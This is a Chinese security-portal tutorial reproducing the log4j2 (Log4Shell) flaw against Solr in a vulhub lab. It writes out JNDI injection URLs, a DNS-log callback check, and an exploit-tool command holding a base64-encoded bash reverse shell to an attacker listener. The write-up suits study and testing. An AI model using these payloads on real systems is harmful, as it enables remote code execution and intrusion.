freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

log4j2漏洞经典复现(vulhub靶场)
无影安全实验室 2022-04-20 17:46:06 433178
所属地 四川省


前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!!!

vulhub靶场下载地址: https://vulhub.org/#/docs/

首先进入我们需要复现的漏洞靶场文件夹下,输入命令 : docker-compose up -d 1650444970_625fcaaa816a9d8f0b5ba.png!small?1650444973413靶场启动成功后,浏览器访问: http://192.168.42.129:8983/solr/admin/cores?action=1

就进入到以下界面,显示的是一堆json格式的数据

1650445154_625fcb62612eb18727675.png!small?1650445156404

访问http://dnslog.cn/  获取一个临时域名

1650445451_625fcc8bf091ed83238a4.png!small

利用获取到的临时域名构造payload ,直接访问

http://192.168.42.129:8983/solr/admin/cores?action=${jndi:ldap://ywk5lh.dnslog.cn}

1650445648_625fcd50243be1919903b.png!small?1650445650222

访问之后,我们查看dnslog.cn页面,点击Refresh按钮刷新,可以看到有请求访问记录,表明存在log4j2漏洞

1650445766_625fcdc644c9b1ebe7690.png!small?1650445768376

打开kali虚拟机,利用JNDI注入工具 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

JNDI注入工具下载地址: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

192.168.42.129为kali攻击机监听地址,kali机执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEyOS82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.42.129


1650446162_625fcf525dd3dc6e876cf.png!small

1650446109_625fcf1d08e1fa76ed2e0.png!small

得到rmi、ldap参数:

1650446917_625fd245e352e3f3cc66d.png!small?1650446920047

然后在kali攻击机上开启nc监听6969端口

1650446763_625fd1ab6d5e5ad089bc5.png!small?1650446765629

在浏览器访问payload

http://192.168.42.129:8983/solr/admin/cores?action=${jndi:rmi://192.168.42.129:1099/rzzbnf}

1650447133_625fd31ddeeefe3660645.png!small?1650447135901

查看监听端,发现shell反弹成功1650447212_625fd36ccdf678a9b5629.png!small?1650447215521

至此漏洞复现完成,复现完后别忘了销毁靶场噢~

1650447311_625fd3cfa3e8e6236c2d9.png!small?1650447313868

# 渗透测试 # web安全 # 漏洞分析
本文为 无影安全实验室 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
无影安全实验室 LV.2
公众号搜索,无影安全实验室。
  • 3 文章数
  • 9 关注者
红队必学,windows极速权限维持-可过360,火绒,Defender!!!!
2023-08-01
【实战】记一次攻防演练,成功拿下服务器并获取几十个数据库权限+十多个web后台
2023-07-23
文章目录